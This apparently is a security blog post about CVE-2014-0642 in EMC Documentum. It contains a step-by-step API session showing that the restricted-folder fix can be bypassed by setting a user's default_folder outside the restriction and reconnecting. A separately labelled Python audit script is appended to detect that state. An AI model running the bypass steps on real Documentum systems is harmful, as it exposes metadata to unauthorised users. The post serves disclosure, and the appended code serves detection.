On April 10, 2014, EMC announced CVE-2014-0642:
EMC Documentum Content Server may be vulnerable to an information disclosure vulnerability that may potentially be exploited by malicious users to gain unauthorized access to metadata. This is due to improper authorization checks being performed when trying to access metadata from folders outside of restricted folders configured for Content Server users. This vulnerability is only limited to reading the metadata as the malicious user is not able to gain read/write access to the content itself.
The researcher who found this vulnerability is Yuri Simione; he is even going to publish an “exploit” (however, it took me 10 minutes to understand how to exploit the vulnerability, but I’m not going to publish any related information). Initially I was confused by the following: Yuri writes that he discovered the vulnerability in January 2014, and EMC has written that the vulnerability is fixed in CS7.1SP2 (released on March 1, 2014), so it took just one month to fix the vulnerability (note that use of the restricted folders feature causes wrong results for some queries). EMC has been trying to fix multiple XSRFs for more than a year and still has not had any success; privilege escalation vulnerabilities were discovered by me in November 2013 and those vulnerabilities are still not fixed, but it’s worth fixing low-impact vulnerabilities within a month. What a shame!
But today I realized that EMC actually didn’t fix anything. To demonstrate this fact, I’m not going to use any SQL injections and/or undocumented RPC commands, just the simple API and my knowledge of the security model:
    API> retrieve,c,dm_user where user_name=USER
    ...
    1102242880000143
    API> get,c,l,user_name
    ...
    dmc_wdk_presets_owner
    API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND)
    [DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH]error: "You have specified a folder path ( '/Temp' ) that is not a folder (or subfolder of a folder) in the user's restricted_folder_ids."
    API> get,c,l,default_folder
    ...
    /Resources/Registry/Presets/Webtop
    API> values,c,l,restricted_folder_ids
    ...
    4
    API> get,c,l,restricted_folder_ids
    ...
    0c02242880000130
    API> get,c,l,restricted_folder_ids
    ...
    0c02242880000106
    API> get,c,l,restricted_folder_ids
    ...
    0c02242880000130
    API> get,c,l,restricted_folder_ids
    ...
    0c02242880000106
    API> get,c,0c02242880000130,r_folder_path
    ...
    /Resources
    API> get,c,0c02242880000106,r_folder_path
    ...
    /System
    API> set,c,l,default_folder
    SET> /Temp
    ...
    OK
    API> save,c,l
    ...
    [DM_FOLDER_E_PATH_EXISTS]error: "Cannot save (or link) 'Temp' folder with path name '/Temp' because one already exists."

    ^^^ we are going to ignore this error

    API> connect,xcp21,dmc_wdk_presets_owner,webtop
    ...
    s1
    API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND)
    count(*)
    ----------------------
                       792
    (1 row affected)
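The session above ends with a restricted user whose default_folder points outside every folder in restricted_folder_ids. As an added example (not code from the original post or from EMC), the following audit flags that state in exported user data; it assumes the dm_user rows and the folder id to r_folder_path mapping have already been exported into Python structures, and the record layout and function names are hypothetical.

```python
# Added example: audit exported dm_user rows for a default_folder outside the
# user's restricted folders. Record layout and function names are assumptions.
from posixpath import normpath

def is_within(path, root):
    """True if path is root itself or a descendant of it (component-wise)."""
    path, root = normpath(path), normpath(root)
    return root == "/" or path == root or path.startswith(root + "/")

def audit_users(users, folder_paths):
    """Return (user_name, finding, detail) tuples for restricted users.

    users: dicts with user_name, default_folder, restricted_folder_ids (ids).
    folder_paths: dict mapping folder object id -> r_folder_path.
    """
    findings = []
    for user in users:
        ids = user.get("restricted_folder_ids") or []
        if not ids:
            continue  # unrestricted user: nothing to compare against
        # De-duplicate ids; an id we cannot resolve is reported, not ignored.
        unresolved = sorted({i for i in ids if i not in folder_paths})
        roots = sorted({folder_paths[i] for i in ids if i in folder_paths})
        default = user.get("default_folder") or ""
        if unresolved:
            findings.append((user["user_name"], "unresolved_folder_id", unresolved))
        if not default.startswith("/") or not any(is_within(default, r) for r in roots):
            findings.append((user["user_name"], "default_folder_outside_restriction", default))
    return findings

# Constructed sample data; the ids and paths mirror the session above.
FOLDER_PATHS = {"0c02242880000130": "/Resources", "0c02242880000106": "/System"}
USERS = [
    {"user_name": "dmc_wdk_presets_owner", "default_folder": "/Temp",
     "restricted_folder_ids": ["0c02242880000130", "0c02242880000106",
                               "0c02242880000130", "0c02242880000106"]},
    {"user_name": "constructed_ok_user",
     "default_folder": "/Resources/Registry/Presets/Webtop",
     "restricted_folder_ids": ["0c02242880000130"]},
    {"user_name": "constructed_prefix_user", "default_folder": "/ResourcesOld/x",
     "restricted_folder_ids": ["0c02242880000130"]},
]

if __name__ == "__main__":
    for finding in audit_users(USERS, FOLDER_PATHS):
        print(finding)
```

The component-wise comparison matters: a plain string-prefix test would accept /ResourcesOld as being under /Resources.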